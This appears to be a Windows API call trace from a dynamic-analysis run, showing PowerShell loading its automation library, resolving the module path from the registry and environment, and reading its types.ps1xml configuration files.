	[0807.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0807.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0807.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0807.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0807.287] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0807.287] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0807.287] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0807.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0807.293] CoTaskMemAlloc (cb=0x104) returned 0x3cee00
	[0807.293] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x3cee00, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0807.293] CoTaskMemFree (pv=0x3cee00) 
	[0807.294] CoTaskMemAlloc (cb=0xcc) returned 0x1b9e2b00
	[0807.295] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b9e2b00, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0807.295] CoTaskMemFree (pv=0x1b9e2b00) 
	[0807.295] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x22da08 | out: phkResult=0x22da08*=0x2fc) returned 0x0
	[0807.295] RegQueryValueExW (in: hKey=0x2fc, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x22d98c, lpData=0x0, lpcbData=0x22d988*=0x0 | out: lpType=0x22d98c*=0x2, lpData=0x0, lpcbData=0x22d988*=0x6c) returned 0x0
	[0807.295] CoTaskMemAlloc (cb=0x70) returned 0x413220
	[0807.295] RegQueryValueExW (in: hKey=0x2fc, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x22d95c, lpData=0x413220, lpcbData=0x22d958*=0x6c | out: lpType=0x22d95c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x22d958*=0x6c) returned 0x0
	[0807.295] CoTaskMemFree (pv=0x413220) 
	[0807.295] CoTaskMemAlloc (cb=0xcc) returned 0x1b9e2b00
	[0807.295] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1b9e2b00, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0807.295] CoTaskMemFree (pv=0x1b9e2b00) 
	[0807.295] CoTaskMemAlloc (cb=0xcc) returned 0x1b9e2b00
	[0807.295] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b9e2b00, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0807.296] CoTaskMemFree (pv=0x1b9e2b00) 
	[0807.300] RegCloseKey (hKey=0x2fc) returned 0x0
	[0807.300] CoTaskMemAlloc (cb=0xcc) returned 0x1b9e2b00
	[0807.300] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b9e2b00, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0807.300] CoTaskMemFree (pv=0x1b9e2b00) 
	[0807.300] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x22da08 | out: phkResult=0x22da08*=0x2fc) returned 0x0
	[0807.300] RegQueryValueExW (in: hKey=0x2fc, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x22d98c, lpData=0x0, lpcbData=0x22d988*=0x0 | out: lpType=0x22d98c*=0x0, lpData=0x0, lpcbData=0x22d988*=0x0) returned 0x2
	[0807.300] RegCloseKey (hKey=0x2fc) returned 0x0
	[0808.046] CoTaskMemAlloc (cb=0x20c) returned 0x46ef20
	[0808.046] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x46ef20 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0808.048] CoTaskMemFree (pv=0x46ef20) 
	[0808.048] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x22d590, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0808.049] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0808.060] CoTaskMemAlloc (cb=0x104) returned 0x3cee00
	[0808.060] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cee00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0808.060] CoTaskMemFree (pv=0x3cee00) 
	[0808.062] CoTaskMemAlloc (cb=0x104) returned 0x3cee00
	[0808.062] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cee00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0808.062] CoTaskMemFree (pv=0x3cee00) 
	[0808.066] CoTaskMemAlloc (cb=0x104) returned 0x3cee00
	[0808.066] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cee00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0808.066] CoTaskMemFree (pv=0x3cee00) 
	[0808.066] CoTaskMemAlloc (cb=0x104) returned 0x3cee00
	[0808.066] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cee00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0808.066] CoTaskMemFree (pv=0x3cee00) 
	[0808.068] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d7f8 | out: phkResult=0x22d7f8*=0x2f8) returned 0x0
	[0808.069] RegQueryValueExW (in: hKey=0x2f8, lpValueName="path", lpReserved=0x0, lpType=0x22d80c, lpData=0x0, lpcbData=0x22d808*=0x0 | out: lpType=0x22d80c*=0x1, lpData=0x0, lpcbData=0x22d808*=0x74) returned 0x0
	[0808.069] RegQueryValueExW (in: hKey=0x2f8, lpValueName="path", lpReserved=0x0, lpType=0x22d77c, lpData=0x0, lpcbData=0x22d778*=0x0 | out: lpType=0x22d77c*=0x1, lpData=0x0, lpcbData=0x22d778*=0x74) returned 0x0
	[0808.069] CoTaskMemAlloc (cb=0x78) returned 0x413220
	[0808.070] RegQueryValueExW (in: hKey=0x2f8, lpValueName="path", lpReserved=0x0, lpType=0x22d74c, lpData=0x413220, lpcbData=0x22d748*=0x74 | out: lpType=0x22d74c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x22d748*=0x74) returned 0x0
	[0808.070] CoTaskMemFree (pv=0x413220) 
	[0808.070] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x22d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0808.070] SetErrorMode (uMode=0x1) returned 0x1
	[0808.070] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x22d6d0 | out: lpFileInformation=0x22d6d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0808.070] SetErrorMode (uMode=0x1) returned 0x1
	[0808.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x22d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0808.077] SetErrorMode (uMode=0x1) returned 0x1
	[0808.078] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x22d6d0 | out: lpFileInformation=0x22d6d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0808.078] SetErrorMode (uMode=0x1) returned 0x1
	[0808.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x22d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0808.082] SetErrorMode (uMode=0x1) returned 0x1
	[0808.082] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x22d6d0 | out: lpFileInformation=0x22d6d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0808.083] SetErrorMode (uMode=0x1) returned 0x1
	[0808.716] CoTaskMemAlloc (cb=0x104) returned 0x3cee00
	[0808.716] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cee00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0808.716] CoTaskMemFree (pv=0x3cee00) 
	[0808.819] CoTaskMemAlloc (cb=0x104) returned 0x3cee00
	[0808.819] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cee00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0808.819] CoTaskMemFree (pv=0x3cee00) 
	[0808.820] GetACP () returned 0x4e4
	[0808.828] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x22d080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0808.828] SetErrorMode (uMode=0x1) returned 0x1
	[0808.829] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x310
	[0808.829] GetFileType (hFile=0x310) returned 0x1
	[0808.829] SetErrorMode (uMode=0x1) returned 0x1
	[0808.829] GetFileType (hFile=0x310) returned 0x1
	[0808.830] ReadFile (in: hFile=0x310, lpBuffer=0x2e52e70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d608, lpOverlapped=0x0 | out: lpBuffer=0x2e52e70*, lpNumberOfBytesRead=0x22d608*=0x1000, lpOverlapped=0x0) returned 1
	[0808.832] ReadFile (in: hFile=0x310, lpBuffer=0x2e52e70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d608, lpOverlapped=0x0 | out: lpBuffer=0x2e52e70*, lpNumberOfBytesRead=0x22d608*=0x1000, lpOverlapped=0x0) returned 1
	[0808.832] ReadFile (in: hFile=0x310, lpBuffer=0x2e52e70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d608, lpOverlapped=0x0 | out: lpBuffer=0x2e52e70*, lpNumberOfBytesRead=0x22d608*=0x1000, lpOverlapped=0x0) returned 1
	[0808.832] ReadFile (in: hFile=0x310, lpBuffer=0x2e52e70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d608, lpOverlapped=0x0 | out: lpBuffer=0x2e52e70*, lpNumberOfBytesRead=0x22d608*=0xcf3, lpOverlapped=0x0) returned 1
	[0808.832] ReadFile (in: hFile=0x310, lpBuffer=0x2e522cb, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x22d608, lpOverlapped=0x0 | out: lpBuffer=0x2e522cb*, lpNumberOfBytesRead=0x22d608*=0x0, lpOverlapped=0x0) returned 1
	[0808.833] ReadFile (in: hFile=0x310, lpBuffer=0x2e52e70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d608, lpOverlapped=0x0 | out: lpBuffer=0x2e52e70*, lpNumberOfBytesRead=0x22d608*=0x0, lpOverlapped=0x0) returned 1
	[0808.835] CloseHandle (hObject=0x310) returned 1
	[0808.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x22d320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0808.840] SetErrorMode (uMode=0x1) returned 0x1
	[0808.840] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x22d580 | out: lpFileInformation=0x22d580*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0808.840] SetErrorMode (uMode=0x1) returned 0x1
	[0808.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x22d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0808.842] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d668 | out: phkResult=0x22d668*=0x310) returned 0x0
	[0808.842] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22d5ec, lpData=0x0, lpcbData=0x22d5e8*=0x0 | out: lpType=0x22d5ec*=0x1, lpData=0x0, lpcbData=0x22d5e8*=0x56) returned 0x0
	[0808.842] CoTaskMemAlloc (cb=0x5a) returned 0x48c150
	[0808.842] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22d5bc, lpData=0x48c150, lpcbData=0x22d5b8*=0x56 | out: lpType=0x22d5bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22d5b8*=0x56) returned 0x0
	[0808.842] CoTaskMemFree (pv=0x48c150) 
	[0808.842] RegCloseKey (hKey=0x310) returned 0x0
	[0808.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x22d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0808.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x22d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0809.705] VirtualQuery (in: lpAddress=0x22c350, lpBuffer=0x22d210, dwLength=0x30 | out: lpBuffer=0x22d210*(BaseAddress=0x22c000, AllocationBase=0x1b0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0810.620] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x310
	[0810.620] GetFileType (hFile=0x310) returned 0x1
	[0810.620] SetErrorMode (uMode=0x1) returned 0x1
	[0810.620] GetFileType (hFile=0x310) returned 0x1
	[0810.620] ReadFile (in: hFile=0x310, lpBuffer=0x2eba030, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d608, lpOverlapped=0x0 | out: lpBuffer=0x2eba030*, lpNumberOfBytesRead=0x22d608*=0x1000, lpOverlapped=0x0) returned 1
	[0810.621] ReadFile (in: hFile=0x310, lpBuffer=0x2eba030, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d608, lpOverlapped=0x0 | out: lpBuffer=0x2eba030*, lpNumberOfBytesRead=0x22d608*=0x1000, lpOverlapped=0x0) returned 1
	[0810.622] ReadFile (in: hFile=0x310, lpBuffer=0x2eba030, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d608, lpOverlapped=0x0 | out: lpBuffer=0x2eba030*, lpNumberOfBytesRead=0x22d608*=0x1000, lpOverlapped=0x0) returned 1
	[0810.623] ReadFile (in: hFile=0x310, lpBuffer=0x2eba030, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d608, lpOverlapped=0x0 | out: lpBuffer=0x2eba030*, lpNumberOfBytesRead=0x22d608*=0x1000, lpOverlapped=0x0) returned 1
	[0810.623] ReadFile (in: hFile=0x310, lpBuffer=0x2eba030, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d608, lpOverlapped=0x0 | out: lpBuffer=0x2eba030*, lpNumberOfBytesRead=0x22d608*=0x1000, lpOverlapped=0x0) returned 1
	[0810.625] ReadFile (in: hFile=0x310, lpBuffer=0x2eba030, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d608, lpOverlapped=0x0 | out: lpBuffer=0x2eba030*, lpNumberOfBytesRead=0x22d608*=0x1000, lpOverlapped=0x0) returned 1
	[0810.625] ReadFile (in: hFile=0x310, lpBuffer=0x2eba030, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d608, lpOverlapped=0x0 | out: lpBuffer=0x2eba030*, lpNumberOfBytesRead=0x22d608*=0x1000, lpOverlapped=0x0) returned 1
	[0810.626] ReadFile (in: hFile=0x310, lpBuffer=0x2eba030, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d608, lpOverlapped=0x0 | out: lpBuffer=0x2eba030*, lpNumberOfBytesRead=0x22d608*=0x1000, lpOverlapped=0x0) returned 1
	[0810.626] ReadFile (in: hFile=0x310, lpBuffer=0x2eba030, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d608, lpOverlapped=0x0 | out: lpBuffer=0x2eba030*, lpNumberOfBytesRead=0x22d608*=0x1000, lpOverlapped=0x0) returned 1
	[0810.628] ReadFile (in: hFile=0x310, lpBuffer=0x2eba030, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d608, lpOverlapped=0x0 | out: lpBuffer=0x2eba030*, lpNumberOfBytesRead=0x22d608*=0x1000, lpOverlapped=0x0) returned 1
	[0810.628] ReadFile (in: hFile=0x310, lpBuffer=0x2eba030, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d608, lpOverlapped=0x0 | out: lpBuffer=0x2eba030*, lpNumberOfBytesRead=0x22d608*=0x1000, lpOverlapped=0x0) returned 1
	[0810.629] ReadFile (in: hFile=0x310, lpBuffer=0x2eba030, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d608, lpOverlapped=0x0 | out: lpBuffer=0x2eba030*, lpNumberOfBytesRead=0x22d608*=0x1000, lpOverlapped=0x0) returned 1
	[0810.629] ReadFile (in: hFile=0x310, lpBuffer=0x2eba030, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d608, lpOverlapped=0x0 | out: lpBuffer=0x2eba030*, lpNumberOfBytesRead=0x22d608*=0x1000, lpOverlapped=0x0) returned 1
	[0810.630] ReadFile (in: hFile=0x310, lpBuffer=0x2eba030, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d608, lpOverlapped=0x0 | out: lpBuffer=0x2eba030*, lpNumberOfBytesRead=0x22d608*=0x1000, lpOverlapped=0x0) returned 1
	[0810.630] ReadFile (in: hFile=0x310, lpBuffer=0x2eba030, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d608, lpOverlapped=0x0 | out: lpBuffer=0x2eba030*, lpNumberOfBytesRead=0x22d608*=0x1000, lpOverlapped=0x0) returned 1
	[0810.630] ReadFile (in: hFile=0x310, lpBuffer=0x2eba030, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d608, lpOverlapped=0x0 | out: lpBuffer=0x2eba030*, lpNumberOfBytesRead=0x22d608*=0x1000, lpOverlapped=0x0) returned 1
	[0810.631] ReadFile (in: hFile=0x310, lpBuffer=0x2eba030, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d608, lpOverlapped=0x0 | out: lpBuffer=0x2eba030*, lpNumberOfBytesRead=0x22d608*=0x1000, lpOverlapped=0x0) returned 1
	[0810.634] ReadFile (in: hFile=0x310, lpBuffer=0x2eba030, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d608, lpOverlapped=0x0 | out: lpBuffer=0x2eba030*, lpNumberOfBytesRead=0x22d608*=0x1000, lpOverlapped=0x0) returned 1
	[0810.634] ReadFile (in: hFile=0x310, lpBuffer=0x2eba030, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d608, lpOverlapped=0x0 | out: lpBuffer=0x2eba030*, lpNumberOfBytesRead=0x22d608*=0x1000, lpOverlapped=0x0) returned 1
	[0810.635] ReadFile (in: hFile=0x310, lpBuffer=0x2eba030, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d608, lpOverlapped=0x0 | out: lpBuffer=0x2eba030*, lpNumberOfBytesRead=0x22d608*=0x1000, lpOverlapped=0x0) returned 1
	[0810.635] ReadFile (in: hFile=0x310, lpBuffer=0x2eba030, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d608, lpOverlapped=0x0 | out: lpBuffer=0x2eba030*, lpNumberOfBytesRead=0x22d608*=0x1000, lpOverlapped=0x0) returned 1
	[0810.636] ReadFile (in: hFile=0x310, lpBuffer=0x2eba030, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d608, lpOverlapped=0x0 | out: lpBuffer=0x2eba030*, lpNumberOfBytesRead=0x22d608*=0x1000, lpOverlapped=0x0) returned 1
	[0810.636] ReadFile (in: hFile=0x310, lpBuffer=0x2eba030, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d608, lpOverlapped=0x0 | out: lpBuffer=0x2eba030*, lpNumberOfBytesRead=0x22d608*=0x1000, lpOverlapped=0x0) returned 1
	[0810.636] ReadFile (in: hFile=0x310, lpBuffer=0x2eba030, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d608, lpOverlapped=0x0 | out: lpBuffer=0x2eba030*, lpNumberOfBytesRead=0x22d608*=0x1000, lpOverlapped=0x0) returned 1
	[0810.637] ReadFile (in: hFile=0x310, lpBuffer=0x2eba030, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d608, lpOverlapped=0x0 | out: lpBuffer=0x2eba030*, lpNumberOfBytesRead=0x22d608*=0x1000, lpOverlapped=0x0) returned 1
	[0810.637] ReadFile (in: hFile=0x310, lpBuffer=0x2eba030, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d608, lpOverlapped=0x0 | out: lpBuffer=0x2eba030*, lpNumberOfBytesRead=0x22d608*=0x1000, lpOverlapped=0x0) returned 1
	[0810.637] ReadFile (in: hFile=0x310, lpBuffer=0x2eba030, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d608, lpOverlapped=0x0 | out: lpBuffer=0x2eba030*, lpNumberOfBytesRead=0x22d608*=0x1000, lpOverlapped=0x0) returned 1
	[0810.638] ReadFile (in: hFile=0x310, lpBuffer=0x2eba030, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d608, lpOverlapped=0x0 | out: lpBuffer=0x2eba030*, lpNumberOfBytesRead=0x22d608*=0x1000, lpOverlapped=0x0) returned 1
